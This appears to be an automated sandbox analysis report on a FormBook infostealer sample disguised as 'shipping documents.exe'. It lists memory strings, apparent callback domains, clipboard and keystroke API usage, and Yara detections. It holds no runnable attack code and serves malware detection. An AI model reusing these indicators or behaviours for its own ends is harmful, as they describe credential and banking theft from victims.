Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 13 Aug 2024 04:45:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b

Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4519511568.0000000004A70000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dmtxwuatbz.cc
Source: RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4519511568.0000000004A70000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
Source: clip.exe, 00000004.00000002.4519037536.00000000062C8000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003978000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
Source: clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.000000000595C000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.000000000300C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
Source: clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: clip.exe, 00000004.00000002.4519037536.0000000006136000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000037E6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
Source: clip.exe, 00000004.00000002.4519037536.0000000006136000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000037E6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: clip.exe, 00000004.00000002.4519037536.0000000006136000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000037E6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
Source: clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.000000000595C000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.000000000300C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
Source: RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.000000000300C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: clip.exe, 00000004.00000002.4516518251.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: clip.exe, 00000004.00000002.4516518251.0000000002A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: clip.exe, 00000004.00000002.4516518251.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: clip.exe, 00000004.00000002.4516518251.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: clip.exe, 00000004.00000002.4516518251.0000000002A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: clip.exe, 00000004.00000002.4516518251.0000000002A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: clip.exe, 00000004.00000003.2464306874.0000000007ADF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=
Source: clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: clip.exe, 00000004.00000002.4519037536.00000000062C8000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003978000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/backup.png
Source: clip.exe, 00000004.00000002.4519037536.00000000062C8000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003978000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png
Source: clip.exe, 00000004.00000002.4519037536.00000000062C8000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003978000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png
Source: clip.exe, 00000004.00000002.4519037536.00000000062C8000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003978000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/moodle.png
Source: clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: clip.exe, 00000004.00000002.4519037536.0000000005314000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000029C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2573613752.0000000013934000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hprlz.cz/w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH
Source: clip.exe, 00000004.00000002.4519037536.0000000005314000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000029C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2573613752.0000000013934000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hprlz.cz/w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
Source: clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.000000000595C000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.000000000300C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.networksolutions.com/
Source: clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
Source: clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_
Source: clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan
Source: clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
Source: clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&
Source: clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_006C425A

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_006C4458

Source: C:\Users\user\Desktop\shipping documents.exe

0_2_006C425A

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006B0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_006B0219

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006DCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_006DCDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4517905581.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2275758100.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4517774741.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4516375312.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2274836520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4517905581.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2275758100.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2282609393.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4517774741.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4516375312.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4517885588.0000000006290000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2274836520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4517885588.0000000005890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2282609393.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00653B4C
Source: shipping documents.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: shipping documents.exe, 00000000.00000000.2055089527.0000000000705000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_cb3086cc-7
